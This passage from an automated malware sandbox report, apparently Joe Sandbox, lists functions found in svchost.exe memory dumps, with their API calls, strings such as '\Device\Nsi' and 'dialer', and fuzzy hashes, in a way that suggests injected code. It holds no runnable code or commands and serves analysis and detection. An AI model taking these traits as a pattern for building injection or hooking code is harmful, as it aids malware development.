Opcode Fuzzy Hash: 94d32eef5ebe536b0a0adfa3e0b32a568b4410008b4bb6dfd84b7e083660618c
Instruction Fuzzy Hash: F561DB3665AB80D6E7748B96E48839A77A1F388764FD98115FA8D47BA4CF7CC450CF00

Function 0000022856DD12B8 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 0000022856DD12E0
_set_statfp.LIBCMT ref: 0000022856DD12FB
_set_statfp.LIBCMT ref: 0000022856DD1317
_set_statfp.LIBCMT ref: 0000022856DD1353

Memory Dump Source

Source File: 00000023.00000002.2666251689.0000022856DC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022856DC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_22856dc0000_svchost.jbxd

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
Instruction ID: 0feaae0a71fd187530291f496f7a9f8e335513c02052717b6314d13ee75dfbae
Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
Instruction Fuzzy Hash: 3B11E962A56E3121F66431E7EC5E3691370EB55374FCB0EA4EA7606BD78F1AFC624200

Function 0000022857351EB8 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 0000022857351EE0
_set_statfp.LIBCMT ref: 0000022857351EFB
_set_statfp.LIBCMT ref: 0000022857351F17
_set_statfp.LIBCMT ref: 0000022857351F53

Memory Dump Source

Source File: 00000023.00000002.2667336285.0000022857340000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022857340000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_22857340000_svchost.jbxd

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
Instruction ID: 4fd261939fa4c9f4d15d07314eb75f919f1c88b50410684655670ad1d31494de
Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
Instruction Fuzzy Hash: 6511A362AEBA8061F6B811E4E45E7E953406B75376FCFC724AB76073D6EF94CC614100

Function 0000022857343878 Relevance: 7.5, APIs: 5, Instructions: 45COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 0000022857343886
GetCurrentProcess.KERNEL32 ref: 00000228573438B4
VirtualProtectEx.KERNEL32 ref: 00000228573438D6
GetCurrentProcess.KERNEL32 ref: 00000228573438F4
VirtualProtectEx.KERNEL32 ref: 0000022857343915

Memory Dump Source

Source File: 00000023.00000002.2667336285.0000022857340000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022857340000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_22857340000_svchost.jbxd

Similarity

API ID: CurrentProcessProtectVirtual$HandleModule
String ID:
API String ID: 1092925422-0
Opcode ID: a6312042db82c9c62213c4cc61283d131af5cc2d1631b4a6c699d8a5d8d1a662
Instruction ID: 1a3d0dbdd7694c09f14706c20c7e3867dbb938c1c6c874814887a8e718905298
Opcode Fuzzy Hash: a6312042db82c9c62213c4cc61283d131af5cc2d1631b4a6c699d8a5d8d1a662
Instruction Fuzzy Hash: 95115229746B80A3EB689B61F40C3D967B1F744BA5FC98425DE8907754EF3DC518C700

Function 0000022856DC84F5 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 135COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 0000022856DC8503
_IsNonwritableInCurrentImage.LIBCMT ref: 0000022856DC8598

Strings

csm, xrefs: 0000022856DC857E
f, xrefs: 0000022856DC8516

Memory Dump Source

Source File: 00000023.00000002.2666251689.0000022856DC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022856DC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_22856dc0000_svchost.jbxd

Similarity

API ID: CurrentImageNonwritable__except_validate_context_record
String ID: csm$f
API String ID: 3242871069-629598281
Opcode ID: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
Instruction ID: c4e0119f1b8ab134b110f98a81432a1035e7a14f844187f3002e02199c35e82f
Opcode Fuzzy Hash: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
Instruction Fuzzy Hash: 8751C332723624AAFB94DF56D448F683FA5F340BC8F928924DA4743788DF76E8518744

Function 0000022856DC84D8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 75COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 0000022856DC8503
_IsNonwritableInCurrentImage.LIBCMT ref: 0000022856DC8598

Strings

csm, xrefs: 0000022856DC857E
f, xrefs: 0000022856DC8516

Memory Dump Source

Source File: 00000023.00000002.2666251689.0000022856DC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022856DC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_22856dc0000_svchost.jbxd

Similarity

API ID: CurrentImageNonwritable__except_validate_context_record
String ID: csm$f
API String ID: 3242871069-629598281
Opcode ID: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
Instruction ID: 150993a0fcefa0c5e933f890b9a46cbd01ac66d29555437a0faf3dddf2aace61
Opcode Fuzzy Hash: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
Instruction Fuzzy Hash: 6731E471222664A6F790DF53E848B693FA4F340BC8F968814EE4B03784CF7AE961C704

Function 00000228573414B4 Relevance: 6.3, APIs: 5, Instructions: 44memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00000228573414D5
HeapFree.KERNEL32 ref: 00000228573414E4
GetProcessHeap.KERNEL32 ref: 00000228573414F0
HeapFree.KERNEL32 ref: 00000228573414FF
GetProcessHeap.KERNEL32 ref: 000002285734152A

Memory Dump Source

Source File: 00000023.00000002.2667336285.0000022857340000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022857340000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_22857340000_svchost.jbxd

Similarity

API ID: Heap$Process$Free
String ID:
API String ID: 3168794593-0
Opcode ID: fc420431358bd0942ab8cb7418bab57f420269e40f755e9827258351f81f4a45
Instruction ID: 9d75c2f6a8fa17625ab5a2f0352bab73f6b3cec116912ceb26d799575595c3c0
Opcode Fuzzy Hash: fc420431358bd0942ab8cb7418bab57f420269e40f755e9827258351f81f4a45
Instruction Fuzzy Hash: A2115135555F94A2E764AFB6F4482DAB371F389B95F898025DB8A03B14DF3CC161C740

Function 00000228573426F0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 184COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 00000228573427D4
StrCpyW.SHLWAPI ref: 00000228573427ED

Strings

\\.\pipe\, xrefs: 00000228573427DF

Memory Dump Source

Source File: 00000023.00000002.2667336285.0000022857340000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022857340000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_22857340000_svchost.jbxd

Similarity

API ID: FileType
String ID: \\.\pipe\
API String ID: 3081899298-91387939
Opcode ID: 6e49d471cca68daba176b61e5ee439cd114eed484b1fe0d421767ac79cd7910d
Instruction ID: 7c452cbc5db89fe6618ddcda1dee551bf02ce248c3af97ca53e85f710cb13c22
Opcode Fuzzy Hash: 6e49d471cca68daba176b61e5ee439cd114eed484b1fe0d421767ac79cd7910d
Instruction Fuzzy Hash: 8D71253A29278161EB3C9FA5D84C7EE6792F744BA4FCE8016DE4963B99DE34C524C700

Function 00000228573424DC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 143COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 00000228573425C3
StrCpyW.SHLWAPI ref: 00000228573425DA

Strings

\\.\pipe\, xrefs: 00000228573425CE

Memory Dump Source

Source File: 00000023.00000002.2667336285.0000022857340000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022857340000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_22857340000_svchost.jbxd

Similarity

API ID: FileType
String ID: \\.\pipe\
API String ID: 3081899298-91387939
Opcode ID: afcb3e66faa42eb2bcf346096e8e020fbdcda90173b34b97db97a4810a61a98e
Instruction ID: 358407bfa2fb99bfe6a15bf492a9283341d8e494803161949e4b1420f91455d8
Opcode Fuzzy Hash: afcb3e66faa42eb2bcf346096e8e020fbdcda90173b34b97db97a4810a61a98e
Instruction Fuzzy Hash: 2C512E3A28678171E67C9FAA915C7EAA752F3857A0FCFC015CD8513B99CE79C4218B40

Function 0000022857350604 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32 ref: 000002285735071B
GetLastError.KERNEL32 ref: 000002285735073D

Strings

U, xrefs: 00000228573506C7

Memory Dump Source

Source File: 00000023.00000002.2667336285.0000022857340000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022857340000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_22857340000_svchost.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: U
API String ID: 442123175-4171548499
Opcode ID: a13edceeabc266f7553562aa63bd5b4e25a5c0a5c0c842b56dee7ecd57ba2728
Instruction ID: 62001d98318df89889ba02cff7dfccf464d1ce934aa322e3b4779b5e51b379f1
Opcode Fuzzy Hash: a13edceeabc266f7553562aa63bd5b4e25a5c0a5c0c842b56dee7ecd57ba2728
Instruction Fuzzy Hash: 9F41C572315A8091EB308F65E4483EAA7A0F3887A5FC98121EE4D87748DF3DC551CB40

Function 000002285734D6C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 000002285734D6F9
LCMapStringW.KERNEL32 ref: 000002285734D781

Strings

LCMapStringEx, xrefs: 000002285734D6DC, 000002285734D6ED

Memory Dump Source

Source File: 00000023.00000002.2667336285.0000022857340000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022857340000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_22857340000_svchost.jbxd

Similarity

API ID: Stringtry_get_function
String ID: LCMapStringEx
API String ID: 2588686239-3893581201
Opcode ID: 8d086b69a67710f16bbac061c243311228bfa9ac644515e4c5b930ef6255b9c6
Instruction ID: f83274999d3d67db54f10d649c6370fbe127d401a18864d98f48773d1aff48e3
Opcode Fuzzy Hash: 8d086b69a67710f16bbac061c243311228bfa9ac644515e4c5b930ef6255b9c6
Instruction Fuzzy Hash: CE113836208BC096D774CF56F4442DAB7A1F7C8BA0F988126EE8D83B19DF38C4608B00

Function 00000228573494A4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlPcToFileHeader.NTDLL ref: 00000228573494E8
RaiseException.KERNEL32 ref: 000002285734952E

Strings

csm, xrefs: 000002285734951B

Memory Dump Source

Source File: 00000023.00000002.2667336285.0000022857340000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022857340000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_22857340000_svchost.jbxd

Similarity

API ID: ExceptionFileHeaderRaise
String ID: csm
API String ID: 2573137834-1018135373
Opcode ID: 9d9897ce25571c28e51806bf44cef2494793ace286fcfb8ca6bb858d3561ec5c
Instruction ID: d92b6341574698023e06402dd5220dc348aebd57083b449febf1d0899c6af151
Opcode Fuzzy Hash: 9d9897ce25571c28e51806bf44cef2494793ace286fcfb8ca6bb858d3561ec5c
Instruction Fuzzy Hash: A4114F36205B8092EB658F15F44829977A1F788BA8F9D8220DF8D07B64EF38C561CB00

Function 000002285734D65C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25COMMON

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 000002285734D68D
InitializeCriticalSectionAndSpinCount.KERNEL32 ref: 000002285734D6A7

Strings

InitializeCriticalSectionEx, xrefs: 000002285734D681

Memory Dump Source

Source File: 00000023.00000002.2667336285.0000022857340000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022857340000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_22857340000_svchost.jbxd

Similarity

API ID: CountCriticalInitializeSectionSpintry_get_function
String ID: InitializeCriticalSectionEx
API String ID: 539475747-3084827643
Opcode ID: 84d4d9e5c8567b0c470c1df2abda769c6c41ef7958af45e9a0e3fb38bbb318e4
Instruction ID: d27315d02f970a9a7ebe282aa573150b4ca797e42d4e02556674da961a242259
Opcode Fuzzy Hash: 84d4d9e5c8567b0c470c1df2abda769c6c41ef7958af45e9a0e3fb38bbb318e4
Instruction Fuzzy Hash: 54F0E226362BD0B1E7299BC1F40C2D43361EB88BA1FCEC021EA4903B15CE38C8B4C700

Function 0000022856DCCB9C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21COMMON

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 0000022856DCCBC5

Strings

November, xrefs: 0000022856DCCBA8, 0000022856DCCBB2
October, xrefs: 0000022856DCCBBE

Memory Dump Source

Source File: 00000023.00000002.2666251689.0000022856DC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022856DC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_22856dc0000_svchost.jbxd

Similarity

API ID: try_get_function
String ID: November$October
API String ID: 2742660187-1636048786
Opcode ID: fdce6644ec914193c36bb80fdc4676b7f0aefee418b5ba3fb3fb30fec7b157a7
Instruction ID: d2889edfebd3d710c7cfd500071100ae30b136a30189ef54b807a519310f29fc
Opcode Fuzzy Hash: fdce6644ec914193c36bb80fdc4676b7f0aefee418b5ba3fb3fb30fec7b157a7
Instruction Fuzzy Hash: 69E09262602559B2FA14ABD7F4482F426319B84784FDB592196190A256CF3AE8BAC340

Function 000002285734D608 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMONLIBRARYCODE

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 000002285734D631
TlsSetValue.KERNEL32 ref: 000002285734D648

Strings

FlsSetValue, xrefs: 000002285734D61E

Memory Dump Source

Source File: 00000023.00000002.2667336285.0000022857340000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022857340000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_22857340000_svchost.jbxd

Similarity

API ID: Valuetry_get_function
String ID: FlsSetValue
API String ID: 738293619-3750699315
Opcode ID: 50ddf312d192e0080d8f7be73491643e669436d55e40d94a578a073710abe0d4
Instruction ID: 0a950441d993ab35335578248b32154e1fb79b5617a9b81254b7c142dc0a82c6
Opcode Fuzzy Hash: 50ddf312d192e0080d8f7be73491643e669436d55e40d94a578a073710abe0d4
Instruction Fuzzy Hash: BAE09B65252A80B1EB2D4BD0F80C6D42362BB887A5FCFC021D60906355CE3CC875C700

Function 0000022857341D60 Relevance: 5.1, APIs: 4, Instructions: 66memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 0000022857341D9B
HeapAlloc.KERNEL32 ref: 0000022857341DAA
GetProcessHeap.KERNEL32 ref: 0000022857341E1E
HeapFree.KERNEL32 ref: 0000022857341E2C

Memory Dump Source

Source File: 00000023.00000002.2667336285.0000022857340000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022857340000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_22857340000_svchost.jbxd

Similarity

API ID: Heap$Process$AllocFree
String ID:
API String ID: 756756679-0
Opcode ID: 3779bcfafb90e2edd239bdf2c4b5cd58a413f829d06d4561fa4d45091366f8f0
Instruction ID: 73ce3bcaf03ba9e31f720edca8e3b06d9ea4605fdb98ce043b41c723fbd3226a
Opcode Fuzzy Hash: 3779bcfafb90e2edd239bdf2c4b5cd58a413f829d06d4561fa4d45091366f8f0
Instruction Fuzzy Hash: E021AC26655FD092DB659FA9F4082DAF3A1FB84BA4FCA8110DE8C47B14EF78C5568700

Function 0000022857341274 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 000002285734127A
HeapAlloc.KERNEL32 ref: 0000022857341289
GetProcessHeap.KERNEL32 ref: 00000228573412A3
HeapAlloc.KERNEL32 ref: 00000228573412B4

Memory Dump Source

Source File: 00000023.00000002.2667336285.0000022857340000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022857340000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_22857340000_svchost.jbxd

Similarity

API ID: Heap$AllocProcess
String ID:
API String ID: 1617791916-0
Opcode ID: 8b038beba27963a8280261039ce2f03ebd498cc74250c16b652da3202c115688
Instruction ID: 3f8dd5bcadb424909aa19f2a3bfeb9b64b6f628dbf54b3a02f558973c7e06dbf
Opcode Fuzzy Hash: 8b038beba27963a8280261039ce2f03ebd498cc74250c16b652da3202c115688
Instruction Fuzzy Hash: 5EE0397169264096E714ABB2E80838937E1EB88B26FCAC024C90907350DF7DC5A9C780

Analysis Process: svchost.exePID: 792, Parent PID: 2788COMMON

Execution Graph

Execution Coverage:	0.8%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	69
Total number of Limit Nodes:	3

Executed Functions

Function 0000018F9CD0104C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 97
memoryregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegQueryInfoKeyW.ADVAPI32 ref: 0000018F9CD010AB
RegEnumValueW.ADVAPI32 ref: 0000018F9CD0110E
GetProcessHeap.KERNEL32 ref: 0000018F9CD01155
HeapAlloc.KERNEL32 ref: 0000018F9CD01163
GetProcessHeap.KERNEL32 ref: 0000018F9CD01187
HeapFree.KERNEL32 ref: 0000018F9CD01195

Strings

d, xrefs: 0000018F9CD010CE

Memory Dump Source

Source File: 00000024.00000002.2669727651.0000018F9CD00000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000018F9CD00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_18f9cd00000_svchost.jbxd

Similarity

API ID: Heap$Process$AllocEnumFreeInfoQueryValue
String ID: d
API String ID: 3743429067-2564639436
Opcode ID: ed3eaeac9b5240f017c69614fb8be245425dbd9313f990ab10755c486963d35d
Instruction ID: 6af43ac769a6c280c19a580292b1483e4cc870297734466def6293e998218717
Opcode Fuzzy Hash: ed3eaeac9b5240f017c69614fb8be245425dbd9313f990ab10755c486963d35d
Instruction Fuzzy Hash: B0418273614B8097E774CF55E4447DAB7A5F389B98F00812AEB9907B58DF38D2A5CB00

Function 0000018F9CD03458 Relevance: 4.5, APIs: 3, Instructions: 43
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameW.KERNEL32 ref: 0000018F9CD0347A
PathFindFileNameW.SHLWAPI ref: 0000018F9CD03489

Part of subcall function 0000018F9CD03930: StrCmpNIW.SHLWAPI ref: 0000018F9CD03948

Part of subcall function 0000018F9CD03878: GetModuleHandleW.KERNEL32 ref: 0000018F9CD03886
Part of subcall function 0000018F9CD03878: GetCurrentProcess.KERNEL32 ref: 0000018F9CD038B4
Part of subcall function 0000018F9CD03878: VirtualProtectEx.KERNEL32 ref: 0000018F9CD038D6
Part of subcall function 0000018F9CD03878: GetCurrentProcess.KERNEL32 ref: 0000018F9CD038F4
Part of subcall function 0000018F9CD03878: VirtualProtectEx.KERNEL32 ref: 0000018F9CD03915

CreateThread.KERNEL32 ref: 0000018F9CD034D7

Part of subcall function 0000018F9CD01EB4: GetCurrentThread.KERNEL32 ref: 0000018F9CD01EBF

Memory Dump Source

Source File: 00000024.00000002.2669727651.0000018F9CD00000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000018F9CD00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_18f9cd00000_svchost.jbxd

Similarity

API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
String ID:
API String ID: 1683269324-0
Opcode ID: c29ba6944873534deeb84ee6eea4394d78c713a8ee642426403de072192bf5b7
Instruction ID: 3eb20ccedaddaed2e033cdc77243d2808620b572bc8358a8ee0d0250d543af16
Opcode Fuzzy Hash: c29ba6944873534deeb84ee6eea4394d78c713a8ee642426403de072192bf5b7
Instruction Fuzzy Hash: 10113C70E1060246F735D729A84A3D9629DAF5C74CF45C03FF92699594EF39C2468B00

Function 0000018F9CD01C28 Relevance: 3.1, APIs: 2, Instructions: 68
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0000018F9CD01650: GetProcessHeap.KERNEL32 ref: 0000018F9CD0165B
Part of subcall function 0000018F9CD01650: HeapAlloc.KERNEL32 ref: 0000018F9CD0166A
Part of subcall function 0000018F9CD01650: RegOpenKeyExW.ADVAPI32 ref: 0000018F9CD016DA
Part of subcall function 0000018F9CD01650: RegOpenKeyExW.ADVAPI32 ref: 0000018F9CD01707
Part of subcall function 0000018F9CD01650: RegCloseKey.ADVAPI32 ref: 0000018F9CD01721
Part of subcall function 0000018F9CD01650: RegOpenKeyExW.ADVAPI32 ref: 0000018F9CD01741
Part of subcall function 0000018F9CD01650: RegCloseKey.ADVAPI32 ref: 0000018F9CD0175C
Part of subcall function 0000018F9CD01650: RegOpenKeyExW.ADVAPI32 ref: 0000018F9CD0177C
Part of subcall function 0000018F9CD01650: RegCloseKey.ADVAPI32 ref: 0000018F9CD01797
Part of subcall function 0000018F9CD01650: RegOpenKeyExW.ADVAPI32 ref: 0000018F9CD017B7
Part of subcall function 0000018F9CD01650: RegCloseKey.ADVAPI32 ref: 0000018F9CD017D2
Part of subcall function 0000018F9CD01650: RegOpenKeyExW.ADVAPI32 ref: 0000018F9CD017F2

Sleep.KERNEL32 ref: 0000018F9CD01C43
SleepEx.KERNELBASE ref: 0000018F9CD01C49

Part of subcall function 0000018F9CD01650: RegCloseKey.ADVAPI32 ref: 0000018F9CD0180D
Part of subcall function 0000018F9CD01650: RegOpenKeyExW.ADVAPI32 ref: 0000018F9CD0182D
Part of subcall function 0000018F9CD01650: RegCloseKey.ADVAPI32 ref: 0000018F9CD01848
Part of subcall function 0000018F9CD01650: RegOpenKeyExW.ADVAPI32 ref: 0000018F9CD01868
Part of subcall function 0000018F9CD01650: RegCloseKey.ADVAPI32 ref: 0000018F9CD01883
Part of subcall function 0000018F9CD01650: RegOpenKeyExW.ADVAPI32 ref: 0000018F9CD018A3
Part of subcall function 0000018F9CD01650: RegCloseKey.ADVAPI32 ref: 0000018F9CD018BE
Part of subcall function 0000018F9CD01650: RegCloseKey.ADVAPI32 ref: 0000018F9CD018C8

Memory Dump Source

Source File: 00000024.00000002.2669727651.0000018F9CD00000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000018F9CD00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_18f9cd00000_svchost.jbxd

Similarity

API ID: CloseOpen$HeapSleep$AllocProcess
String ID:
API String ID: 1534210851-0
Opcode ID: 446663f49501c54a1dde533fa37134df150f915d943a345b55ac37b77b82859e
Instruction ID: 6067647526526ed28c66e0b385a295f6aab6bf3a031c4a5cc5c176c53c3d2e46
Opcode Fuzzy Hash: 446663f49501c54a1dde533fa37134df150f915d943a345b55ac37b77b82859e
Instruction Fuzzy Hash: B931DD35A0060291FE75DB3AE9413DE12ADAB45BC8F05D03BFE2987695DE14C652CB60

Function 0000018F9CD03930 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 15
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

StrCmpNIW.SHLWAPI ref: 0000018F9CD03948

Strings

dialer, xrefs: 0000018F9CD03941

Memory Dump Source

Source File: 00000024.00000002.2669727651.0000018F9CD00000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000018F9CD00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_18f9cd00000_svchost.jbxd

Similarity

API ID:
String ID: dialer
API String ID: 0-3528709123
Opcode ID: 949ed436222ef7ba0644b0ca804308ca47b9c81469ce6be8bad6d29646da7b56
Instruction ID: bf0179c9fc943d54cfd95c1f28b5d78373c40e3540512bd8d6e86c42093a1f24
Opcode Fuzzy Hash: 949ed436222ef7ba0644b0ca804308ca47b9c81469ce6be8bad6d29646da7b56
Instruction Fuzzy Hash: D1D05E30B1164B86FB38DFA598813A02368AF09B08F45C03ADA2502114DF188B8E8B10

Function 0000018F9CCD2908 Relevance: 1.7, APIs: 1, Instructions: 186
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE ref: 0000018F9CCD2A31

Memory Dump Source

Source File: 00000024.00000002.2669208973.0000018F9CCD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000018F9CCD0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_18f9ccd0000_svchost.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: f6ddeab5387358d888722616617f0efec67712a96652def8838ee087e5407534
Instruction ID: 66e1579099ddbab4110c6339e0c10dee339a06a1567448a5ec8956aad25aaf90
Opcode Fuzzy Hash: f6ddeab5387358d888722616617f0efec67712a96652def8838ee087e5407534
Instruction Fuzzy Hash: A561F232B0169187EA68CF19D4407A9BB91FB44B98F54C139EA1E87786DF38D997C700

Non-executed Functions

Function 0000018F9CD02CDC Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 264
stringlibraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32 ref: 0000018F9CD02D80
lstrlenW.KERNEL32 ref: 0000018F9CD02FBA

Part of subcall function 0000018F9CD01A14: OpenProcess.KERNEL32 ref: 0000018F9CD01A3A
Part of subcall function 0000018F9CD01A14: K32GetModuleFileNameExW.KERNEL32 ref: 0000018F9CD01A58
Part of subcall function 0000018F9CD01A14: PathFindFileNameW.SHLWAPI ref: 0000018F9CD01A67
Part of subcall function 0000018F9CD01A14: lstrlenW.KERNEL32 ref: 0000018F9CD01A73
Part of subcall function 0000018F9CD01A14: StrCpyW.SHLWAPI ref: 0000018F9CD01A86
Part of subcall function 0000018F9CD01A14: CloseHandle.KERNEL32 ref: 0000018F9CD01A94

GetProcAddress.KERNEL32 ref: 0000018F9CD02D95

Part of subcall function 0000018F9CD01554: StrCmpIW.SHLWAPI ref: 0000018F9CD01585

Part of subcall function 0000018F9CD03930: StrCmpNIW.SHLWAPI ref: 0000018F9CD03948

StrCmpNIW.SHLWAPI ref: 0000018F9CD02DD8
lstrlenW.KERNEL32 ref: 0000018F9CD02F00

Strings

\Device\Nsi, xrefs: 0000018F9CD02DCB
NtQueryObject, xrefs: 0000018F9CD02D8B
ntdll.dll, xrefs: 0000018F9CD02D79

Memory Dump Source

Source File: 00000024.00000002.2669727651.0000018F9CD00000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000018F9CD00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_18f9cd00000_svchost.jbxd

Similarity

API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
String ID: NtQueryObject$\Device\Nsi$ntdll.dll
API String ID: 2119608203-3850299575
Opcode ID: 2588cc794520ead529bdc0a32c038e4709a5f15ae479e9f47b13431256f42674
Instruction ID: e5fa5f69a1b949b92fc78bea359d12700c4d691bc09ac8a4043bafe8460ca3cd
Opcode Fuzzy Hash: 2588cc794520ead529bdc0a32c038e4709a5f15ae479e9f47b13431256f42674
Instruction Fuzzy Hash: 14B1A032A12A5182EB78CF2AD4407D963A8FB45B8CF45902BFE6953795DF35CE42CB40

Function 0000018F9CD07E70 Relevance: 10.6, APIs: 7, Instructions: 72
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 0000018F9CD07E8C
RtlCaptureContext.NTDLL ref: 0000018F9CD07EB9
RtlLookupFunctionEntry.NTDLL ref: 0000018F9CD07ED3
RtlVirtualUnwind.NTDLL ref: 0000018F9CD07F14
IsDebuggerPresent.KERNEL32 ref: 0000018F9CD07F68
SetUnhandledExceptionFilter.KERNEL32 ref: 0000018F9CD07F89
UnhandledExceptionFilter.KERNEL32 ref: 0000018F9CD07F94

Memory Dump Source

Source File: 00000024.00000002.2669727651.0000018F9CD00000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000018F9CD00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_18f9cd00000_svchost.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 3140674995-0
Opcode ID: 1239a149ef62a939d07da7a6345777f7e6476c10c46ebdc58c2fff80381e5b80
Instruction ID: b30271959943f0d281fa337c5e66806fcc9186fe51f65b3096f3698b17b07570
Opcode Fuzzy Hash: 1239a149ef62a939d07da7a6345777f7e6476c10c46ebdc58c2fff80381e5b80
Instruction Fuzzy Hash: E6319072601B818AEB74DF64E8503DE7768F788748F44842EEA5D47B98EF38C649CB10

Function 0000018F9CD0B50C Relevance: 9.1, APIs: 6, Instructions: 83COMMON

